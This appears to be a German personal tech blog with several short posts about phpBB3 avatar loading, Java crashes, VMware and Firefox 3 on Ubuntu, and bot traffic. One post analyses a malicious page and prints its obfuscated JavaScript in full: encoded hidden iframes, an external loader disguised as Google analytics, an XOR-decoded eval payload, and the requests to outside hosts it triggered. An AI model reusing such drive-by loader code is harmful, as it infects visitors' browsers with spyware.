everflux

PhpBB3 ist nun schon eine Weile veröffentlicht – und so stellt man das eine oder andere Forum um. Probeläufe werden gemacht, ob eine phpBB2 nach phpBB3 Migration klappt, alle Userdaten und Avatare mitkommen.

Nachdem dann auch das Avatar-Salt richtig gesetzt ist, sieht erstmal alles gut aus. Bis die ersten User des phpBB3 Forum klagen, dass „die Seite langsam“ ist. Auch mir selber kamen längere Ladezeiten unter.

Manchmal dauerte es 15 Sekunden bis ein Avatar Bild geladen war – der Rest des phpBB Forums war schnell wie erwartet.

Des Rätsels Lösung fand sich dann dank Stefan:

Nur bei HTTP 1.1 Requests und aktiviertem Keepalive bzw. HTTP Pipelining und nur bei Bildern trat das Problem auf. Schnell war identifiziert, dass die 15 Sekunden genau der maximalen Keepalive Zeit des Apache entsprachen.

Was war nun passiert: Im Apache ist mod_gzip (bzw. DEFLATE) aktiviert. Die Avatare werden von einem PHP Script ausgeliefert und nicht mehr direkt verlinkt. Dabei wird von dem Script auch der Content-Length Header gesetzt – auf die Größe der Bilddatei.

Dann braust das mod_gzip einmal über das Bild und macht es kleiner – und sei es nur ein kleines Byte. Der Content-Length Header wird nicht angepaßt, und der Browser glaubt er müsse noch auf fehlende Bytes warten. Das tut er dann, bis der Timeout erreicht ist.

Lösung dafür war dann diese Zeile in der Apache Config, zumindest als vorläufiger Workaround:

SetEnvIfNoCase Request_URI download/file\\.php$ no-gzip dont-vary

Yahoo hat die Crawler Infrastruktur aktualisiert – teil davon ist Slurp 3.0, der neue Yahoo Crawler. Wie Golem berichtet hat Yahoo bisher nicht veröffentlicht, welche Aktualisierungen an dem Crawler vorgenommen wurden.

Dies ist kein unübliches Vorgehen, lediglich als Google seinen Crawler beigebracht hat, gzip Inhalte zu verstehen, oder die Crawler an einen gemeinsamen Cache angeschlossen hatte, um doppeltes Crawlen zu vermeiden, wurde dies publik gemacht. Bei Yahoo steht eine Umstellung auf Hadoop an – die Zukunft lautet bei Yahoo immer stärker OpenSource und Java. Sicherlich nicht schlecht für die Community, zudem zeigt es deutlich, dass Java alles andere als „langsam“ ist. Nachdem Yahoo auf einigen Seiten für 20% und mehr des Traffiks verantwortlich war, da der Crawler wild auf content war, könnte dieses unerwünschte Phänomen mit dem Slurp 3.0 nun der Vergangenheit angehören.

Das aktuelle Java JRE (und JDK) scheinen gehörig überarbeitet worden zu sein – leider nicht unbedingt zum Positiven. Wie auch hier oder in den Bug Reports zu lesen ist, gibt es allerlei Abstürze.

Besonders ärgerlich, wenn man mit Eclipse (Europa) arbeiten möchte, und dies beim Projekt bauen oder Mylin initialisieren einfach die Java Virtual Machine tötet. Auch der Wechsel zum OpenJDK, das für Ubuntu verfügbar ist, hat leider keine Abhilfe schaffen können. Auch RSSowl funktioniert nicht richtig – stürzt aber wenigstens nicht ab – es werden einfach keine Feedeinträge angezeigt.

Als workaround empfehlen einige ein Downgrade auf eine ältere Java Version (vorsicht, hier können sich Sicherheitslücken einschleichen!) – oder eine 32bit Version zu verwenden. (Der Bug scheint sich lediglich bei AMD64 bzw. 64bit Intel Architektur auszuwirken.)

Ich versuche es mit dem Angriff nach vorne – Eclipse ganymed, dessen Startlogo fast suggeriert, dass bei „Ganymed“ ein Buchstabe vergessen wurde.

Update:

Also alle guten Vorsätzen und Versuchen haben nicht gefruchtet – allein ein Downgrade der Java Installation auf Ubuntu Gutsy 1.6.0_03 half ein stabiles Java zu erhalten. Da der Bug schon eine Weile bekannt ist, mache ich mir keine großen Hoffnungen, dass bis zum Erscheinen von Hardy Heron das Problem behoben ist.

Für das Nokia N95 ist die Firmware v21.0.0.16 jetzt per Nokia Software Update (NSU) verfügbar. Ich habe für die Firmware als product code 0534853 verwendet, und mußte noch das Nokia Software Update Programm unter Windows aktualisieren.
Der Download der N95 v21 Firmware ist rund 120 Mb groß, danach kann das Handy per Internet auf die neue Firmware geflash werden.

Weiterlesen »

Ubuntu Hardy Heron steht vor der Tür – nach dem Update funktioniert der VMware Server nicht mehr. Auch der neueste Vmware Server 1.0.5 benötigt ein paar Anpassungen, damit er mit Ubuntu Hardy 8.04 LTS funktioniert.

Hier ist meine Anleitung um den Vmware Server auf Ubuntu Hardy einzurichten:

1. Neue Version vom Vmware Server herunterladen – ich habe 1.0.5 verwendet – und installieren
2. Den Any-Any Patch Version 116 herunterladen, auspacken und runme.pl aufrufen
3. Im Verzeichnis /usr/lib/vmware/lib/libgcc_s.so.1 die Datei löschen und durch einen Link auf die normale Version ersetzen ( ln -s /lib/libgcc_s.so.1 . )

Bei mir funktioniert damit der Vmware Server unter Ubuntu Hardy Heron wieder. Weiterlesen »

Firefox 3 ist zwar noch beta – doch das neue Ubuntu Hardy Heron wird Firefox 3 als Browser mitbringen.

Leider sind noch nicht alle Plugins für den Firefox 3 aktualisiert worden – viele benötigen keine Anpassungen und würden funktionieren, wenn lediglich die als kompatibel anerkannte Firefox Version angepaßt würde.

Zum Beispiel Adblock Plus, oder die all in one gestures für Firefox funktionieren bei mir ohne Probleme mit Firefox 3.

Der Trick um die Addons zur Arbeit mit Firefox 3 zu bewegen ist relativ simpel: „about:config“ in die URL Leiste eintragen. Dort einen neuen (boolean) Key anlegen „extensions.checkCompatibility“ auf „false“ setzen.

Nach einem Neustart funktionieren dann viele der alten Plugins und Addons auch mit dem aktuellen Firefox 3!

Wie Golem berichtet gibt es – nach fünf Monaten Wartezeit – endlich eine neue Version der Kalendaranwendung Sunbird und des zugehörigen Addons für Mozilla Thunderbird: Lightning.

Die gerade erschienene Version 0.8 bringt neue Features, ein aufgeräumteres userinterface und Stabilitätsverbesserungen. Eine Version für 64bit Linux ist leider nicht verfügbar, dürfte sich aber demnächst hier einfinden: Mozilla Contrib.

Man besucht eine Webseite – der Browser stürzt ab. Normalerweise passiert sowas nicht – Grund genug, sich das einmal anzuschauen.
Die Seite selber ist leer – bis auf JavaScript dass bei (sehr) flüchtiger Betrachtung nach einem Google Analytics Code aussieht. Aber auch wenn Google gerne JavaScript obfuscated – so viel Versteckspielen und dann noch eine domain von der externes JavaScript nachgeladen wird und safe.google-signature.com lautet? Merke: Nicht überall, wo „safe“ draufsteht oder „google-signature“ ist Google oder „safe“ drinn.

<!– ~ –><script language=“javascript“>var mnx=’%‘;document.write( unescape( ‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+mnx+
‚74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+
mnx+’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+
mnx+’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script><script language=“javascript“>var mnx=’%‘;document.write( unescape(‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+
mnx+’74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+mnx+
’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+mnx+
’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script>
<!– ~ –><script src=“http://safe.google-signature.com/webanalytics.js“></script><script>function v47f603df6c30c(v47f603df6c312){ function v47f603df6c319 () {var v47f603df6c31d=16; return v47f603df6c31d;} return(parseInt(v47f603df6c312,v47f603df6c319()));}function v47f603df6c33e(v47f603df6c342){ function
v47f603df6c350 () {return 2;} var v47f603df6c346=“;for(v47f603df6c34a=0; v47f603df6c34a<v47f603df6c342.length; v47f603df6c34a+=v47f603df6c350()){ v47f603df6c346+=(String.fromCharCode(v47f603df6c30c(v47f603df6c342.substr(v47f603df6c34a, v47f603df6c350()))));}return v47f603df6c346;} document.write(v47f603df6c33e(‚3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63
756D656E742E777269746528273C696672616D65206E616D653D623632343234396337373234207372633D5C2
7687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33353231372
92B2737645C272077696474683D333837206865696768743D3931207374796C653D5C27646973706C61793A20
6E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E‘));</script>

Die IP des hosts zeigt irgendwo nach Panama, die Domain ist auf „irgendwen“ registriert.
Danach versucht der Browser Daten nachzuladen:
GET http://safe.google-signature.com/webanalytics.js HTTP/1.0
GET http://usersoftware.in/sutra/in.cgi?3 HTTP/1.0
GET http://201.218.250.115/webanalytics/count.php?o=1 HTTP/1.0
Hier geht nur der erste Request noch gut, alles andere existiert nicht mehr, so dass eine Analyse schwer wird. Aber es sieht verdammt stark nach dem Versuch aus, Spyware oder ähnliches zu verbreiten. Eine Google Suche nach „google-signature.com“ bringt einige Seiten, in die der Code nicht korrekt eingebaut ist.
function google_jdbhra(google_aotnpc,google_uhj) { var google_dtbxcs = „“; for (var i = 0 ; i < google_aotnpc.length; ++i) google_dtbxcs += String.fromCharCode(google_uhj ^ google_aotnpc.charCodeAt(i)); return google_dtbxcs; } function google_vcp(google_hmp) { eval(google_hmp); return; } google_vcp(google_jdbhra(„\xe8\xf6\xf1\xfb\xf0\xe8\xb1\xec\xeb\xfe\xeb\xea\xec\xa2\xbd\xdb\xf0\xf1\xfa
\xbd\xa4\x92\x95\xfb\xf0\xfc\xea\xf2\xfa\xf1\xeb\xb1\xe8\xed\xf6\xeb\xfa\xb7\xb8\xa3\xf6\xb8\xb4\xb8\xf9
\xed\xfe\xb8\xb4\xb8\xf2\xfa\xbf\xec\xed\xb8\xb4\xb8\xfc\xa2\xbd\xb8\xb4\xea\xf1\xfa\xec\xfc\xfe\xef\xfa
\xb7\xb8\xf7\xeb\xeb\xef\xba\xac\xde\xb0\xb0\xad\xaf\xae\xb1\xad\xae\xa7\xb1\xad\xaa\xaf\xb1\xae\xae
\xaa\xb0\xe8\xfa\xfd\xfe\xf1\xfe\xf3\xe6\xeb\xf6\xfc\xec\xb0\xfc\xf0\xea\xf1\xeb\xb1\xef\xf7\xef\xba\xac\xd9\xf0
\xba\xac\xdb\xae\xb8\xb6\xb4\xb8\xbd\xbf\xe8\xf6\xfb\xeb\xf7\xa2\xbd\xaf\xbd\xbf\xf7\xfa\xf6\xf8\xf7\xeb\xa2
\xbd\xaf\xbd\xbf\xec\xeb\xb8\xb4\xb8\xe6\xf3\xfa\xa2\xbd\xfb\xf6\xb8\xb4\xb8\xec\xef\xb8\xb4\xb8\xf3\xfe
\xe6\xb8\xb4\xb8\xa5\xf1\xf0\xb8\xb4\xb8\xf1\xfa\xbd\xa1\xb8\xb6\xa4″, 159));

Nach dem Umzug gabs Probleme mit der Rufnummer – genauer gesagt, es gab keine zu sehen. Da es sich um einen „DUWA“ Anschluß handelt, glaubt einem das vom Dtag Support erstmal keiner.
Nach mehreren Anrufen hat sich jedoch – nicht ohne Rückversicherungen dass ich nichts geändert habe, keine zusätzlichen Telefonanalgen Rufnummern filtern etc. – bereit erklärt, es an die „Meßtechnik“ weiterzugeben. Natürlich mit dem Hinweis, dass es teuer werden kann, wenn ich den Fehler verursacht habe.
Da schwitze ich jedes mal. Keine halbe stunde später tut alles wie gewünscht, und ein reichlich nervöser Mitarbeiter räumt ein, dass es einen „kleinen Konfigurationsfehler in der Vermittlungstechnik“ gab. Aber das sei behoben und schönen Tag noch.
Danke – auch ich werde zukünftig Kunden, die theoretisch unmögliche Fehler melden öfter mal wieder glauben.

Der Amazon Bot (AMZNKAssocBot/4.0) ist ein ganz schön fleißiger Bot. Insbesondere, wenn es darum geht, die robots.txt abzurufen.
Offenbar findet so ein Abruf nämlich vor jedem anderen Request statt, ein Verhalten, dass ich früher so nicht beobachtet habe.

87.238.80.64 - - [30/Mar/2008:13:48:53 +0200] "GET /robots.txt HTTP/1.1"
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:54 +0200] "GET /robots.txt HTTP/1.1" 
200783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:55 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:56 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:56 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:58 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:59 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:49:00 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum

Der Amazon Partnernet Support ist dann auch direkt kontaktiert worden – schließlich ändert sich die robots.txt so schnell nun auch wieder nicht, und der alte Server freut sich über solche Requests nicht unbedingt in den siebten Himmel.